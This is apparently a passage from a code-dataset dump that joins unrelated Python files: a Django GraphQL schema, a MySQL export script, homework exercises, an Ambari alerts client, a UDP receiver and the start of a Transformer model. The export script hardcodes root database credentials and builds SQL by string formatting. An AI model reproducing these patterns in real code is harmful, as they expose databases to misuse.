users.schema import UserType\nfrom .models import Location, Activity, Log\n\n# TYPES\n\n\nclass LocationNode(DjangoObjectType):\n class Meta:\n model = Location\n interfaces = (relay.Node,)\n filter_fields = ['name']\n\n\nclass ActivityNode(DjangoObjectType):\n class Meta:\n model = Activity\n interfaces = (relay.Node,)\n filter_fields = ['name']\n\n\nclass LogNode(DjangoObjectType):\n class Meta:\n model = Log\n interfaces = (relay.Node, )\n filter_fields = {\n 'date': ['exact', 'icontains', 'istartswith'],\n 'jailer': ['exact'],\n 'jailer__username': ['exact', 'icontains', 'istartswith'],\n 'activity': ['exact'],\n 'activity__name': ['exact', 'icontains', 'istartswith'],\n 'location': ['exact'],\n 'location__name': ['exact', 'icontains', 'istartswith'],\n 'notes': ['exact', 'icontains'],\n 'deleted': ['exact']\n }\n\n\n# QUERY\n\nclass Query(graphene.ObjectType):\n location = relay.Node.Field(LocationNode)\n locations = DjangoFilterConnectionField(\n LocationNode)\n activity = relay.Node.Field(ActivityNode)\n activities = DjangoFilterConnectionField(\n ActivityNode)\n log = relay.Node.Field(LogNode)\n logs = DjangoFilterConnectionField(LogNode)\n\n\n# MUTATION\n\n\nclass CreateLocation(graphene.relay.ClientIDMutation):\n\n class Input:\n name = graphene.String(required=True)\n\n location = graphene.Field(LocationNode)\n\n def mutate_and_get_payload(self, info, **input):\n location = Location(\n name=input.get('name')\n )\n location.save()\n return CreateLocation(location=location)\n\n\nclass CreateActivity(graphene.relay.ClientIDMutation):\n class Input:\n name = graphene.String(required=True)\n activity = graphene.Field(ActivityNode)\n\n def mutate_and_get_payload(self, info, **input):\n activity = Activity(\n name=input.get('name')\n )\n activity.save()\n return CreateActivity(activity=activity)\n\n\nclass CreateLog(graphene.relay.ClientIDMutation):\n class Input:\n date = graphene.DateTime()\n jailer_username = graphene.String()\n location_name = graphene.String()\n activity_name = graphene.String()\n notes = graphene.String()\n\n log = graphene.Field(LogNode)\n jailer = graphene.Field(UserType)\n\n def mutate_and_get_payload(self, info, **input):\n user = get_user_model()\n log = Log(\n date=input.get('date'),\n jailer=user.objects.get(\n username=input.get('jailer_username')),\n location=Location.objects.get(name=input.get('location_name')),\n activity=Activity.objects.get(name=input.get('activity_name')),\n notes=input.get('notes')\n )\n log.save()\n return CreateLog(log=log)\n\n\nclass Mutation(graphene.AbstractType):\n create_location = CreateLocation.Field()\n create_activity = CreateActivity.Field()\n create_log = CreateLog.Field()\n","sub_path":"logs/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"597919492","text":"import datetime\nimport time\n\nimport pandas as pd\n\nimport pymysql\n\n\ndef get_day_list():\n day_list = []\n datestart = datetime.datetime.strptime(start_day, '%Y-%m-%d')\n dateend = datetime.datetime.strptime(end_day, '%Y-%m-%d')\n d = datestart\n delta = datetime.timedelta(days=1)\n while d <= dateend:\n # print(d.strftime(\"%Y-%m-%d\"))\n day = d.strftime(\"%Y-%m-%d\")\n day_list.append(day)\n d += delta\n return day_list\n\n\nif __name__ == '__main__':\n start_day = '2019-01-24'\n end_day = '2019-02-10'\n # end_day = '2019-01-26'\n db = pymysql.connect(\"192.168.103.31\", \"root\", \"adminadmin\", \"hotpot\")\n cursor = db.cursor()\n # 获取起止时间的时间范围\n day_list = get_day_list()\n data_list = []\n for change_day in day_list:\n sql = \"\"\"SELECT storeId,storeName,city,city_level from SHOP_DETAIL WHERE storeId in (select DISTINCT storeId from SHOP_WAITE WHERE crawlTime='%s') GROUP BY storeId ;\"\"\" % change_day\n cursor.execute(sql)\n results = cursor.fetchall()\n for data in results:\n storeName = data[1]\n city_level = data[3]\n city = data[2]\n storeId = str(data[0])\n crawlTime = change_day\n data = [storeName, city_level, city, storeId, crawlTime ]\n data_list.append(data)\n print(data_list)\n # 写入文件\n import csv\n filename = '海底捞门店数' + str(int(time.time())) + '.csv'\n with open(filename, 'w', newline='') as f:\n writer = csv.writer(f)\n head_list = ['店铺名字', '城市级别', '城市', '店铺ID', '抓取时间']\n writer.writerow(head_list)\n for row in data_list:\n writer.writerow(row)\n import pandas as pd\n csv_data = pd.read_csv(filename,\n engine='python') # 发现调用pandas的read_csv()方法时,默认使用C engine作为parser engine,\n # 而当文件名中含有中文的时候,用C engine在部分情况下就会出错。所以在调用read_csv()方法时指定engine为Python就可以解决问题了。\n csv_data.to_excel(filename.replace('csv', 'xlsx'), index=False)\n","sub_path":"IDGdemo/数据库整理/海底捞/5.海底捞获取门店数.py","file_name":"5.海底捞获取门店数.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"534457836","text":"# Task 3. Shortest Word\n\ndef shortest_words():\n\n while True:\n user_string = input(\"Please enter the non-empty string: \\n\")\n if not user_string:\n continue\n else:\n break\n\n string_to_list = user_string.split()\n\n len_list = []\n for word in string_to_list:\n len_list.append(len(word))\n\n \n print(f\"The length of the shortest word(s) is {min(len_list)}\")\n \nshortest_words()\n","sub_path":"homework3/hw_3_3.py","file_name":"hw_3_3.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"540382215","text":"#Program to Split the array and add the first part to the end\nimport array\nimport logging as l\nl.basicConfig(filename='arr4.log', level=l.INFO, format='%(asctime)s-%(message)s')\na=[1,2,3,4,5]\na1=[]\nshift=2\nprint(\"The original array\",a) \n\nfor i in range(0,shift):\n while(a[i]<=2):\n temp=a[i]\n a1.append(temp)\n a.remove(a[i])\n print(\"The spilt array of 2 indexes \", a1)\nprint(\"The original array after the spilt\",a) \n\ntry:\n sumofarray=[]\n sumofarray=a+a1\n print(\"The sum of array is:\",sumofarray)\n \nexcept Exception as e:\n l.ERROR(e)\n\n\n\n\n \n ","sub_path":"arr4.py","file_name":"arr4.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"417674506","text":"import math\nimport re\nimport time\nimport os\nos.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = \"hide\"\nimport pygame\n\ndef hello(name):\n if type(name) != str:\n raise TypeError(\"Not a string\")\n correct_name = name.strip()\n if len(correct_name) == 0 or len(correct_name) >= 20:\n raise ValueError(\"Not a valid string\")\n welcome_message = 'Hello ' + correct_name + '!'\n return welcome_message\n\ndef calculate_hypotenuse(a, b):\n c = math.sqrt(a**2 + b**2)\n return c\n\ndef are_all_conditions_true(conditions):\n if type(conditions) == type(None) or len(conditions) == 0:\n return None\n for x in conditions:\n if x == False:\n return False\n return True\n\ndef is_a_condition_true(conditions):\n if len(conditions) == 0:\n return None\n for x in conditions:\n if x == True:\n return True\n return False\n\ndef filter_integers_greater_than(l, n):\n filter_list = []\n for x in l:\n if x>n:\n filter_list.append(x)\n return filter_list\n\ndef find_cheapest_hotels(hotel_daily_rates, maximum_daily_rate):\n min_hotel = []\n\n for hotel in hotel_daily_rates:\n if hotel[1] <= maximum_daily_rate:\n min_hotel.append(hotel)\n\n min_hotel = sorted(min_hotel, key=lambda item:item[1])\n value = []\n for i in range(len(min_hotel)):\n value.append(min_hotel[i][0])\n\n return value\n\ndef calculate_euclidean_distance_between_2_points(p1, p2):\n euclidean_distance = math.sqrt((p1[0]-p2[0])**2 +(p1[1]-p2[1])**2)\n return euclidean_distance\n\ndef calculate_euclidean_distance_between_points(points):\n if len(points)<2:\n raise ValueError('The list MUST contain at least 2 points')\n\n sum_length = 0\n for i in range(len(points) - 1):\n j = i + 1\n sum_length += calculate_euclidean_distance_between_2_points(points[i], points[j])\n\n return sum_length\n\ndef capitalize_words(s):\n if type(s) == type(None):\n return None\n if type(s) != str:\n raise TypeError(\"Not a string\")\n \n s = s.lower()\n s = s.split() \n new_string = [] \n\n for i in range(len(s)):\n word = s[i][0].upper() + s[i][1:]\n new_string.append(word)\n\n return \" \".join(new_string)\n\ndef uppercase_lowercase_words(s):\n if type(s) == type(None):\n return None\n if type(s) != str:\n raise TypeError(\"Not a string\")\n\n s = s.split()\n for i in range(len(s)):\n if i%2==0:\n s[i] = s[i].upper()\n else:\n s[i] = s[i].lower()\n return \" \".join(s)\n\ndef factorial(n):\n if type(n) != int:\n raise TypeError(\"Not an integer\")\n elif n<0:\n raise ValueError(\"Not a positive integer\")\n\n if n == 0 or n == 1:\n return 1\n \n return n*factorial(n-1)\n\ndef char_to_int(c):\n if type(c) != str:\n raise TypeError(\"Not a string\")\n elif len(c) > 1:\n raise ValueError(\"Not a single digit\")\n\n value = ord(c)\n if (value < 48 or value > 57):\n raise ValueError(\"Not a positive integer string expression\") \n\n return value - 48\n\ndef string_to_int(s):\n if type(s) != str:\n raise TypeError(\"Not a string\")\n\n value = 0\n for i in range(len(s)):\n value += char_to_int(s[i])\n value *= 10\n value //= 10\n return value\n\ndef is_palindrome(value):\n if type(value) == type(None):\n return False\n\n value = str(value)\n value = (\"\".join(re.split('\\W', value))).lower()\n if len(value) == 0:\n return False\n \n if len(value) % 2 == 0:\n count = len(value)//2\n else:\n count = len(value)//2 - 1\n\n for i in range(count):\n if value[i] != value[-i-1]:\n return False\n\n return True\n\n\ndef roman_numeral_to_int(roman_numeral):\n if not(isinstance(roman_numeral, str)) or len(roman_numeral) == 0:\n raise TypeError(\"Not a string\")\n roman_list = {\n 'N': 0,\n 'I': 1,\n 'V': 5,\n 'X': 10,\n 'L': 50,\n 'C': 100,\n 'D': 500,\n 'M': 1000\n }\n for i in range(len(roman_numeral)):\n if roman_list.get(roman_numeral[i]) == None:\n raise ValueError(\"Not a Roman numeral\")\n count = 1\n for i in range(len(roman_numeral)-1):\n if roman_numeral[i] == roman_numeral[i+1]:\n count += 1\n else:\n count = 1\n if count == 4:\n raise ValueError(\"Not a Roman numeral\")\n \n \n value = 0\n i = 0\n while i < len(roman_numeral) - 1:\n s1 = roman_list[roman_numeral[i]]\n s2 = roman_list[roman_numeral[i+1]]\n if s1 >= s2:\n if (s1 + s2) == 10 or (s1+s2) == 100 or (s1+s2) == 1000:\n raise ValueError(\"Not a Roman numeral\")\n value += s1\n else:\n minus = s2 - s1\n if minus == 4 or minus == 9 or minus == 40 or minus == 90 or minus == 400 or minus == 900: \n i += 1\n value = value + minus\n else:\n raise ValueError(\"Not a Roman numeral\")\n i += 1\n\n if i == len(roman_numeral) - 1:\n value += roman_list[roman_numeral[i]]\n\n return value\n\ndef play_melody(melody, sound_basedir):\n if not(isinstance(melody, list) or isinstance(melody, tuple)) or len(melody) <= 1:\n raise TypeError(\"Not a string\")\n for i in range(len(melody)):\n if not(isinstance(melody[i], str)):\n raise TypeError(\"Not a string\")\n\n for i in range(len(melody)):\n if len(melody[i]) <= 1 or len(melody[i]) > 3:\n raise ValueError(\"Not a valid melody\")\n available_melody = ['A', 'B', 'C' , 'D', 'E', 'F', 'G']\n if melody[i][0] not in available_melody:\n raise ValueError(\"Not a valid melody\")\n if len(melody[i]) == 2:\n if int(melody[i][1]) < 2 or int(melody[i][1]) > 5:\n raise ValueError(\"Not a valid melody\")\n else:\n if melody[i][1] != 'B' and melody[i][1] != '#':\n raise ValueError(\"Not a valid melody\")\n if int(melody[i][2]) < 2 or int(melody[i][2]) > 5:\n raise ValueError(\"Not a valid melody\")\n if (melody[i][0] == 'E' and melody[i][1] == '#') or (melody[i][0] == 'F' and melody[i][1] == 'B') or (melody[i][0] == 'B' and melody[i][1] == '#') or (melody[i][0] == 'C' and melody[i][1] == 'B'):\n raise ValueError(\"Not a valid melody\")\n\n pygame.mixer.init()\n list_sound = []\n for i in range(len(melody)):\n cur_melody = melody[i].lower()\n if cur_melody[1] == '#':\n cur_melody = list(cur_melody)\n cur_melody[1] = 'b'\n if cur_melody[0] == 'c':\n cur_melody[0] = 'd'\n elif cur_melody[0] == 'd':\n cur_melody[0] = 'e'\n elif cur_melody[0] == 'e':\n cur_melody[0] = 'f'\n elif cur_melody[0] == 'f':\n cur_melody[0] = 'g'\n elif cur_melody[0] == 'g':\n cur_melody[0] = 'a'\n elif cur_melody[0] == 'a':\n cur_melody[0] = 'b'\n elif cur_melody[0] == 'b':\n cur_melody[0] = 'c'\n cur_melody[2] = str(int(cur_melody[2])+1)\n cur_melody = ''.join(cur_melody)\n cur_sound = sound_basedir + '/' + cur_melody + '.ogg'\n list_sound.append(cur_sound)\n sound = pygame.mixer.Sound(cur_sound)\n sound.play()\n time.sleep(0.4)\n pygame.time.delay(400)\n \n\n return list_sound\n\n\n","sub_path":"python_basics.py","file_name":"python_basics.py","file_ext":"py","file_size_in_byte":7533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"491125119","text":"import requests\nimport json\nimport urllib3\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n\ndef getServicesAlert(nodeName, port, clusterName, auth_values, https, verify):\n\n if https == \"n\":\n\n url = \"http://\" + nodeName + \":\" + port + \"/api/v1/clusters/\" + clusterName + \"/alerts\"\n\n elif https == \"y\":\n\n url = \"https://\" + nodeName + \":\" + port + \"/api/v1/clusters/\" + clusterName + \"/alerts\"\n\n else:\n\n exit(\"[servicesAlert] could not run because of : bad value provided. Please check the https var\")\n\n querystring = {\"fields\": \"*\"}\n\n headers = {\n 'cache-control': \"no-cache\",\n 'Postman-Token': \"7eb64f13-6076-4c96-a5c3-d0de174b5df9\"\n }\n\n response = requests.request(\"GET\", url, headers=headers, params=querystring, auth=auth_values, verify=verify)\n\n result = json.loads(response.text)\n\n return result\n","sub_path":"servicesAlert/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"611946066","text":"from itertools import filterfalse\nFILENAME = 'B-large'\n\n\ndef optimal_choises(stack):\n stack = list(map(lambda x: x == '+', stack))\n # print(stack)\n changes = 0\n while len(list(filterfalse(lambda x: x, stack))):\n changes += 1\n if len(stack) == len(list(filterfalse(lambda x: x, stack))):\n stack[:] = list(map(lambda x: not x, stack[:][::-1]))\n # print(stack)\n return changes\n same_pancakes = 1\n while stack[same_pancakes] == stack[0]:\n same_pancakes += 1\n stack[:same_pancakes] = list(map(lambda x: not x, stack[:same_pancakes][::-1]))\n # print(stack)\n # print(list(map(lambda x: not x, stack[:same_pancakes][::-1])))\n # break\n\n return changes\n\nwith open('{}.in'.format(FILENAME), 'r') as f:\n input = f.read().split()\n\nwith open('{}.out'.format(FILENAME), 'w') as f:\n for test_case in range(1, int(input[0]) + 1):\n out = optimal_choises(input[test_case])\n f.write('Case #{num}: {value}\\n'.format(num=test_case, value=out))\n","sub_path":"codes/CodeJamCrawler/16_0_2_neat/16_0_2_hodlin_run.py","file_name":"16_0_2_hodlin_run.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"643694691","text":"import socket\n\n\ndef main():\n # 1.创建udp套接字\n udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n # 2.绑定本地信息 (必须绑定本地的网络)\n local_addr = ('', 7788)\n udp_socket.bind(local_addr)\n # 3.接收数据\n recv_data = udp_socket.recvfrom(1024)\n # recv_data变量存储的是一个元组 (接收的数据,(发送方的ip, port))\n recv_msg = recv_data[0] #data\n send_addr = recv_data[1] #addr\n # 4.打印接收的数据\n # print(\"%s:%s\" % (str(send_addr), recv_msg.decode(\"utf-8\"))) 注意windows默认是gbk编码\n print(\"%s:%s\" % (str(send_addr), recv_msg.decode(\"gbk\")))\n # 5.关闭套接字\n udp_socket.close()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"01-网络编程/01-网络编程-UDP/06-解析接收的UDP消息.py","file_name":"06-解析接收的UDP消息.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"622699486","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@Author: liutienan\n@Date: 2018-06-08 10:18:22\n@Last Modified by: liutienan\n@Last Modified time: 2018-06-08 10:18:22\n\"\"\"\n\"\"\"\n如何安装Pypy?\n1. 用Anaconda创建pypy环境 conda create -n pypy python=3.5\n2. 下载安装文件 wget https://bitbucket.org/pypy/pypy/downloads/pypy3-v6.0.0-linux64.tar.bz2\n3. 解压文件 tar -xf pypy3-v6.0.0-linux64.tar.bz2\n4. 将文件夹拷贝在~/anaconda3/envs/pypy/文件中把目录拷贝进去,如果目录名相同则合并目录。\n5. 激活pyppy环境 source activate pypy\n注:mac、windows下的pypy安装方法类似,注意win32位的pypy可以在64位的win7上运行。\n\"\"\"\nfrom time import time\nfrom math import ceil\nfrom random import randint\nfrom pyspark.sql.functions import col, rand\nfrom pyspark.sql.types import IntegerType\nfrom pyspark.sql.session import SparkSession\n\n\ndef fib(n):\n \"\"\"[summary]\n Calculate Nth Fibonacci sequence value\n Arguments:\n n {int}\n\n Returns:\n int\n \"\"\"\n if n == 0 or n == 1:\n return n\n que = [0, 1]\n while n > 1:\n que.append(que.pop(0) + que[0])\n n -= 1\n return que[1]\n\n\ndef merge_sort(arr):\n n = len(arr)\n que = []\n item_len = 1\n while item_len < n:\n pair_len = item_len * 2\n n_pair = ceil(n / pair_len)\n # divide problem to sub-problem, iterate each pair\n for k in range(n_pair):\n low = i = k * pair_len\n # check array length\n if k == n_pair - 1:\n mid = j = min(low + item_len, n)\n high = n\n else:\n mid = j = low + item_len\n high = low + pair_len\n # merge: append smaller element\n while i < mid and j < high:\n if arr[i] < arr[j]:\n que.append(arr[i])\n i += 1\n else:\n que.append(arr[j])\n j += 1\n # if one item is empty, append all the elements of the other\n que.extend(arr[j:high] if i == mid else arr[i:mid])\n # swap\n que, arr = [], que\n # increase sub-problem length\n item_len *= 2\n return arr\n\n\ndef group_sum_max(df):\n return df.groupby(\"id\").agg({\"val\": \"sum\"}).agg({\"\"})\n\n\ndef unit_test(fn, X, Y, n_iter=100000):\n \"\"\"[summary]\n Correctness and performance testing\n Arguments:\n fn {function} -- function to test\n X {iterable} -- a series of input\n Y {iterable} -- expected results\n\n Keyword Arguments:\n n_iter {int} -- number of iterations (default: {100000})\n \"\"\"\n\n print(\"Test %s:\" % fn.__name__)\n # Correctness\n assert all(y0 == y for y0, y in zip(map(fn, X), Y)), \"Test not passed!\"\n print(\"Test passed!\")\n # Performance\n start = time()\n for _ in range(n_iter):\n for x in X:\n fn(x)\n print(\"Time elapsed %.3f\\n\" % (time()-start))\n\n\nif __name__ == \"__main__\":\n # # Test fib\n # X = range(1, 11)\n # Y = [1, 1, 2, 3, 5, 8, 13, 21, 34]\n # unit_test(fib, X, Y)\n\n # # Test merge-sort\n # X = []\n # Y = []\n # for _ in range(1000):\n # L = randint(0, 1000)\n # row = [randint(0, 20) for _ in range(L)]\n # X.append(row)\n # Y.append(sorted(row))\n # unit_test(merge_sort, X, Y, n_iter=1)\n\n # Test spark\n spark = SparkSession.builder.appName(\"test_pypy\").getOrCreate()\n df = spark.range(0, 10**4).withColumn('id', (col('id') /\n 10**3).cast('integer')).withColumn('val', rand())\n df.cache()\n df.show()\n res = group_sum_max(df)\n res.show()\n","sub_path":"Other/pypy.py","file_name":"pypy.py","file_ext":"py","file_size_in_byte":3641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"633363898","text":"import sys\nsys.path.append('../preprocess/')\nimport preprocess\nimport pandas as pd\n\ntest_labels = pd.read_csv('../data/test_labels.csv')\ntest = pd.read_csv('../data/test.csv')\n\n# test = pd.concat([test, test_labels], axis=1, sort=False)\ntest = test.merge(test_labels, how='outer').fillna(0)\n\ntest = test[test['toxic'] >= 0]\n\ntest_labels = test.loc[:, ['id', 'toxic','severe_toxic','obscene','threat','insult','identity_hate']]\ntest = test.loc[:, ['id', 'comment_text']]\n\nprint(test_labels.head())\nprint(test.head())\n\ntest_labels.to_csv('../data/clean_test_labels.csv',index=False)\ntest.to_csv('../data/clean_test.csv',index=False)\n\n","sub_path":"evaluation/clean_test.py","file_name":"clean_test.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"232158499","text":"#!/usr/bin/env python3\nimport math\nimport numpy as np\nimport tensorflow as tf\nfrom lib.layers import *\nfrom lib.tensor_utils import *\nfrom collections import namedtuple\nfrom . import TranslateModel\n\n\nclass FFN:\n \"\"\"\n Feed-forward layer\n \"\"\"\n def __init__(self, name,\n inp_size, hid_size, out_size,\n relu_dropout):\n self.name = name\n self.relu_dropout = relu_dropout\n\n with tf.variable_scope(name):\n self.first_conv = Dense(\n 'conv1',\n inp_size, hid_size,\n activation=tf.nn.relu,\n b=tf.zeros_initializer())\n\n self.second_conv = Dense(\n 'conv2',\n hid_size, out_size,\n activation=lambda x: x,\n b=tf.zeros_initializer())\n\n def __call__(self, inputs, params_summary=None):\n \"\"\"\n inp: [batch_size * ninp * inp_dim]\n ---------------------------------\n out: [batch_size * ninp * out_dim]\n \"\"\"\n with tf.variable_scope(self.name):\n hidden = self.first_conv(inputs)\n if is_dropout_enabled():\n hidden = tf.nn.dropout(hidden, 1.0 - self.relu_dropout)\n\n outputs = self.second_conv(hidden)\n\n return outputs\n\n\nclass MultiHeadAttn:\n \"\"\"\n Multihead scaled-dot-product attention with input/output transformations\n \"\"\"\n ATTN_BIAS_VALUE = -1e9\n\n def __init__(\n self, name, inp_size,\n key_depth, value_depth, output_depth,\n num_heads, attn_dropout, attn_value_dropout, debug=False, _format='combined'\n ):\n self.name = name\n self.key_depth = key_depth\n self.value_depth = value_depth\n self.num_heads = num_heads\n self.attn_dropout = attn_dropout\n self.attn_value_dropout = attn_value_dropout\n self.debug = debug\n self.format = _format\n\n with tf.variable_scope(name):\n self.scope = tf.get_variable_scope()\n\n if self.format == 'use_kv':\n self.query_conv = Dense(\n 'query_conv',\n inp_size, key_depth,\n activation=lambda x: x,\n b=tf.zeros_initializer(),\n )\n\n self.kv_conv = Dense(\n 'mem_conv',\n inp_size, key_depth + value_depth,\n activation=lambda x: x,\n b=tf.zeros_initializer(),\n )\n\n self.combined_conv = Dense(\n 'combined_conv',\n inp_size, key_depth * 2 + value_depth,\n activation=lambda x: x,\n W=tf.concat([self.query_conv.W, self.kv_conv.W], axis=1),\n b=tf.concat([self.query_conv.b, self.kv_conv.b], axis=0),\n )\n\n elif self.format == 'combined':\n self.combined_conv = Dense(\n 'mem_conv', # old name for compatibility\n inp_size, key_depth * 2 + value_depth,\n activation=lambda x: x,\n b=tf.zeros_initializer())\n\n self.query_conv = Dense(\n 'query_conv',\n inp_size, key_depth,\n activation=lambda x: x,\n W=self.combined_conv.W[:, :key_depth],\n b=self.combined_conv.b[:key_depth],\n )\n\n self.kv_conv = Dense(\n 'kv_conv',\n inp_size, key_depth + value_depth,\n activation=lambda x: x,\n W=self.combined_conv.W[:, key_depth:],\n b=self.combined_conv.b[key_depth:],\n )\n else:\n raise Exception(\"Unexpected format: \" + self.format)\n\n self.out_conv = Dense(\n 'out_conv',\n value_depth, output_depth,\n activation=lambda x: x,\n b=tf.zeros_initializer())\n\n def __call__(self, query_inp, attn_mask, kv_inp=None, kv=None):\n \"\"\"\n query_inp: [batch_size * n_q * inp_dim]\n attn_mask: [batch_size * 1 * n_q * n_kv]\n kv_inp: [batch_size * n_kv * inp_dim]\n -----------------------------------------------\n results: [batch_size * n_q * output_depth]\n \"\"\"\n assert kv is None or kv_inp is None, \"please only feed one of kv or kv_inp\"\n with tf.name_scope(self.name) as scope:\n if kv_inp is not None or kv is not None:\n q = self.query_conv(query_inp)\n if kv is None:\n kv = self.kv_conv(kv_inp)\n k, v = tf.split(kv, [self.key_depth, self.value_depth], axis=2)\n else:\n combined = self.combined_conv(query_inp)\n q, k, v = tf.split(combined, [self.key_depth, self.key_depth, self.value_depth], axis=2)\n q = self._split_heads(q) # [batch_size * n_heads * n_q * (k_dim/n_heads)]\n k = self._split_heads(k) # [batch_size * n_heads * n_kv * (k_dim/n_heads)]\n v = self._split_heads(v) # [batch_size * n_heads * n_kv * (v_dim/n_heads)]\n\n key_depth_per_head = self.key_depth / self.num_heads\n q = q / math.sqrt(key_depth_per_head)\n\n # Dot-product attention\n # logits: (batch_size * n_heads * n_q * n_kv)\n attn_bias = MultiHeadAttn.ATTN_BIAS_VALUE * (1 - attn_mask)\n logits = tf.matmul(\n tf.transpose(q, perm=[0, 1, 2, 3]),\n tf.transpose(k, perm=[0, 1, 3, 2])) + attn_bias\n weights = tf.nn.softmax(logits)\n\n if is_dropout_enabled():\n weights = tf.nn.dropout(weights, 1.0 - self.attn_dropout)\n x = tf.matmul(\n weights, # [batch_size * n_heads * n_q * n_kv]\n tf.transpose(v, perm=[0, 1, 2, 3]) # [batch_size * n_heads * n_kv * (v_deph/n_heads)]\n )\n combined_x = self._combine_heads(x)\n\n if is_dropout_enabled():\n combined_x = tf.nn.dropout(combined_x, 1.0 - self.attn_value_dropout)\n\n outputs = self.out_conv(combined_x)\n return outputs\n\n def _split_heads(self, x):\n \"\"\"\n Split channels (dimension 3) into multiple heads (dimension 1)\n input: (batch_size * ninp * inp_dim)\n output: (batch_size * n_heads * ninp * (inp_dim/n_heads))\n \"\"\"\n old_shape = x.get_shape().dims\n dim_size = old_shape[-1]\n new_shape = old_shape[:-1] + [self.num_heads] + [dim_size // self.num_heads if dim_size else None]\n ret = tf.reshape(x, tf.concat([tf.shape(x)[:-1], [self.num_heads, -1]], 0))\n ret.set_shape(new_shape)\n return tf.transpose(ret, [0, 2, 1, 3]) # [batch_size * n_heads * ninp * (hid_dim//n_heads)]\n\n def _combine_heads(self, x):\n \"\"\"\n Inverse of split heads\n input: (batch_size * n_heads * ninp * (inp_dim/n_heads))\n out: (batch_size * ninp * inp_dim)\n \"\"\"\n x = tf.transpose(x, [0, 2, 1, 3])\n old_shape = x.get_shape().dims\n a, b = old_shape[-2:]\n new_shape = old_shape[:-2] + [a * b if a and b else None]\n ret = tf.reshape(x, tf.concat([tf.shape(x)[:-2], [-1]], 0))\n ret.set_shape(new_shape)\n ret = tf.transpose(ret, perm=[0, 1, 2])\n return ret\n\n\nclass Transformer:\n def __init__(\n self, name,\n inp_voc, out_voc,\n *_args,\n emb_size=None, hid_size=512,\n key_size=None, value_size=None,\n inner_hid_size=None, # DEPRECATED. Left for compatibility with older experiments\n ff_size=None,\n num_heads=8, num_layers=6,\n attn_dropout=0.0, attn_value_dropout=0.0, relu_dropout=0.0, res_dropout=0.1,\n debug=None, share_emb=False, inp_emb_bias=False, rescale_emb=False,\n dst_reverse=False, dst_rand_offset=False,\n res_steps='ldan', normalize_out=False, multihead_attn_format='v1', **_kwargs\n ):\n\n if isinstance(ff_size, str):\n ff_size = [int(i) for i in ff_size.split(':')]\n\n if _args:\n raise Exception(\"Unexpected positional arguments\")\n\n emb_size = emb_size if emb_size else hid_size\n key_size = key_size if key_size else hid_size\n value_size = value_size if value_size else hid_size\n if key_size % num_heads != 0:\n raise Exception(\"Bad number of heads\")\n if value_size % num_heads != 0:\n raise Exception(\"Bad number of heads\")\n\n self.name = name\n self.num_layers_enc = num_layers\n self.num_layers_dec = num_layers\n self.res_dropout = res_dropout\n self.emb_size = emb_size\n self.hid_size = hid_size\n self.rescale_emb = rescale_emb\n self.dst_reverse = dst_reverse\n self.dst_rand_offset = dst_rand_offset\n self.normalize_out = normalize_out\n\n with tf.variable_scope(name):\n max_voc_size = max(len(inp_voc), len(out_voc))\n self.emb_inp = Embedding(\n 'emb_inp', max_voc_size if share_emb else len(inp_voc), emb_size,\n initializer=tf.random_normal_initializer(0, emb_size**-.5))\n\n emb_out_matrix = None\n if share_emb:\n emb_out_matrix = self.emb_inp.mat\n self.emb_out = Embedding(\n 'emb_out', max_voc_size if share_emb else len(out_voc), emb_size,\n matrix=emb_out_matrix,\n initializer=tf.random_normal_initializer(0, emb_size**-.5))\n\n self.emb_inp_bias = 0\n if inp_emb_bias:\n self.emb_inp_bias = tf.get_variable('emb_inp_bias', shape=[1, 1, emb_size])\n\n # Encoder Layers\n self.enc_attn = [ResidualLayerWrapper(\n 'enc_attn-%i' % i,\n MultiHeadAttn(\n 'enc_attn-%i' % i,\n inp_size=emb_size if i == 0 else hid_size,\n key_depth=key_size,\n value_depth=value_size,\n output_depth=hid_size,\n num_heads=num_heads,\n attn_dropout=attn_dropout,\n attn_value_dropout=attn_value_dropout,\n debug=debug),\n inp_size=emb_size if i == 0 else hid_size,\n out_size=emb_size if i == 0 else hid_size,\n steps=res_steps,\n dropout=res_dropout)\n for i in range(self.num_layers_enc)]\n\n self.enc_ffn = [ResidualLayerWrapper(\n 'enc_ffn-%i' % i,\n FFN(\n 'enc_ffn-%i' % i,\n inp_size=emb_size if i == 0 else hid_size,\n hid_size=ff_size if ff_size else (inner_hid_size if inner_hid_size else hid_size),\n out_size=hid_size,\n relu_dropout=relu_dropout),\n inp_size=emb_size if i == 0 else hid_size,\n out_size=hid_size,\n steps=res_steps,\n dropout=res_dropout)\n for i in range(self.num_layers_enc)]\n\n if self.normalize_out:\n self.enc_out_norm = LayerNorm('enc_out_norm', inp_size=emb_size if self.num_layers_enc == 0 else hid_size)\n\n # Decoder layers\n self.dec_attn = [ResidualLayerWrapper(\n 'dec_attn-%i' % i,\n MultiHeadAttn(\n 'dec_attn-%i' % i,\n inp_size=emb_size if i == 0 else hid_size,\n key_depth=key_size,\n value_depth=value_size,\n output_depth=hid_size,\n num_heads=num_heads,\n attn_dropout=attn_dropout,\n attn_value_dropout=attn_value_dropout,\n debug=debug),\n inp_size=emb_size if i == 